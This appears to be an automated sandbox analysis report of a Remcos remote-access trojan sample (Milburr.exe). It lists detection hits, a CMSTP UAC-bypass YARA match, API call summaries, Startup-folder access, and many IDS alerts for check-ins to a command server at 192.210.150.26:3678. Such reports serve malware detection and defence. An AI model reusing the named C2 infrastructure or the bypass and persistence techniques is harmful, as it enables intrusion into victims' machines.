                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: l1QC9H0SNR.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_0043293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,2_2_0043293A
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_0043293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,5_2_0043293A
                    Source: Milburr.exeBinary or memory string: -----BEGIN PUBLIC KEY-----

                    Exploits

                    barindex
                    Yara detected UAC Bypass using CMSTP
                    Source: Yara matchFile source: 2.2.Milburr.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.Milburr.exe.3630000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.Milburr.exe.3280000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Milburr.exe.3d80000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.Milburr.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Milburr.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.Milburr.exe.3280000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Milburr.exe.3d80000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Milburr.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.Milburr.exe.3630000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000002.2280428273.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.2273702079.0000000003280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4574181082.0000000003630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2281391837.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4567862337.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Milburr.exe PID: 3652, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Milburr.exe PID: 364, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Milburr.exe PID: 5160, type: MEMORYSTR

                    Privilege Escalation

                    barindex
                    Contains functionality to bypass UAC (CMSTPLUA)
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_00406764 _wcslen,CoGetObject,2_2_00406764
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_00406764 _wcslen,CoGetObject,5_2_00406764
                    Source: l1QC9H0SNR.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BB445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_00BB445A
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BBC6D1 FindFirstFileW,FindClose,0_2_00BBC6D1
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BBC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00BBC75C
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BBEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00BBEF95
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BBF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00BBF0F2
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BBF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00BBF3F3
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BB37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00BB37EF
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BB3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00BB3B12
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BBBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00BBBCBC
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,2_2_0040B335
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,2_2_0041B42F
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,2_2_0040B53A
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_0044D5E9 FindFirstFileExA,2_2_0044D5E9
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,2_2_004089A9
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_00406AC2 FindFirstFileW,FindNextFileW,2_2_00406AC2
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,2_2_00407A8C
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,2_2_00418C69
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,2_2_00408DA7
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_0072445A GetFileAttributesW,FindFirstFileW,FindClose,2_2_0072445A
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_0072C6D1 FindFirstFileW,FindClose,2_2_0072C6D1
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_0072C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_0072C75C
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_0072EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_0072EF95
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_0072F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_0072F0F2
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_0072F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_0072F3F3
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_007237EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_007237EF
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_00723B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00723B12
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_0072BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_0072BCBC
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,5_2_0040B335
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,5_2_0041B42F
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,5_2_0040B53A
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_0044D5E9 FindFirstFileExA,5_2_0044D5E9
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,5_2_004089A9
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_00406AC2 FindFirstFileW,FindNextFileW,5_2_00406AC2
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,5_2_00407A8C
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,5_2_00418C69
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,5_2_00408DA7
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,2_2_00406F06
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49713 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49709 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49761 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49741 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49711 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49779 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49814 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49798 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49829 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49724 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49842 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49858 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49877 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49893 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49908 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49921 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49937 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49955 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49971 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49988 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50005 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50006 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50013 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50008 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50009 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50010 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50015 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50017 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50018 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50016 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50020 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50021 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50022 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50011 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50023 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50026 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50029 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50031 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50012 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50034 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50033 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50032 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50030 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50036 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50037 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50025 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50038 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50024 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50039 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50041 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50035 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50040 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50043 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50045 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50044 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50028 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50046 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50049 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50047 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50050 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50051 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50048 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50052 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50054 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50055 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50058 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50053 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50056 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50060 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50059 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50064 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50062 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50057 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50061 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50073 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50067 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50076 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50070 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50078 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50079 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50082 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50084 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50085 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50080 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50088 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50087 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50089 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50068 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50086 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50092 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50083 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50066 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50093 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50098 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50090 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50095 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50074 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50097 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50100 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50104 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50103 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50105 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50094 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50069 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50108 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50109 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50101 -> 192.210.150.26:3678
